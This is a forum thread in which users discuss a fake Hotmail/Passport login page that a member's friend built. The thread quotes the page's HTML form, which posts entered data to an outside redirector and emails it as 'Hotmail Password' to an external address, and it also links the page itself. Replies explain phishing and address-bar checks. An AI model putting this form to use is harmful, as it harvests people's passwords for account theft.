OMFG! HUGE potential "Passport" weakness ???

By eaglebtc
in Smart Home, Network & Security

 Share

  

40 members have voted

  1. 1. OMFG! HUGE potential "Passport" weakness ???

    • This is HUGE. Call Microsoft ASAP.
      1
    • This is pretty serious, but can be controlled.
      6
    • This isn't a big deal.
      4
    • You're on crack. :P
      29

Recommended Posts

Mentor

eaglebtc

Posted
Posted

OMFG...my friend scared the s*** out of me tonight. :o He created a web page which appeared to be a hotmail/passport login screen (please re-enter your password). He said he was testing "some spam site" of his, and as soon as I entered my password I got about 20 bazillion XXX popups. :o :mad:

After closing all of those, I looked at the Source code for his page.

The following four lines literally scared me s***less:

(Please note: the URL in the "action" line below is a REDIRECTOR. Do not follow it. This is CODE, So it should not be linkable anyhow. If you follow it, you are a dirty b4st4rd :p)

<pre>

<FORM method=POST action="http://www.join4free.com/?wm=42960"> 

<input type=hidden name="to" value="x-rated007@excite.com">

<input type=hidden name="subject" value="Hotmail Password">

<input type=hidden name="redir"

value="http://lc2.law5.hotmail.passport.com/cgi-bin/loginerr?

disk=&login=&f=0&curmbox=ACTIVE&_lang=&error=4&sec=no

&reauth=&id=2&ct=958278062&_lang=&domain=">

</pre>

:o :o :o

Look at that! In those four short lines is the power to do the following:

  • Forward to a specified site
  • send an email with certain information
  • Use the Microsoft Passport authentication system to retrieve and verify that information.

My friend should be shot for doing this. I have chewed him out, and even after he convinced me that x-rated007@excite.com is his old email, and that he used it just as a joke, I still did NOT think it was funny.

Do you think this is a HUGE weakness in the Passport system? Can it be abused like the AOL pages that prompt the AOLemmings to enter their passwords? Maybe I'm overreacting a bit, but it did scare me a lot. Perhaps it's nothing at all.

What do you think? Let the forum know.

Link to comment
Share on other sites
Grand Master

Glowstick

Posted
Posted

And then?

You can do this with every login system. If the page just looks like Passport, tons of people will fall on it.

How do you think hackers get passwords of lots of people? By faking login sites. If Passport wants you to authenticate, just make sure the address bar says www.passport.com. Coz to get Passport authenticated, the affiliated website redirects you to Passport which redirects you back to the website when being authenticated.

Link to comment
Share on other sites
Mentor

eaglebtc

Posted
  • Author
Posted

EmuZombie:

That was not the URL he gave me. That was a redirect from his page.

Here's the page in question:

http://www.staticfree.net/newbieslair/

It looks convincing to me. The reason I got so upset about this is because Microsoft has tried to make a reasonably secure system. Sure, AOLers are just plain stupid to go to a site asking for their password, but when you have something like this that legitimate businesses are trying to use, couldn't any Joe Schmoe set up a phony passport authentication site?

Furthermore, isn't it possible to make the Address Bar show anything you want? Theoretically, you could just show a long hairy URL that looks authentic to the untrained eye...

Link to comment
Share on other sites
Mentor

kintamanate

Posted
Posted

Bah, you are saying this like its something new?

How do you think I found neowin in the first place?

i was bored one day and looked how not to get scammed for this hotmail coding junk.

it brought me to an old neowin news post #60 i think it was. right Neobond? (Back in late May, early June);) ahh those were the days...:disappoin

Link to comment
Share on other sites
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.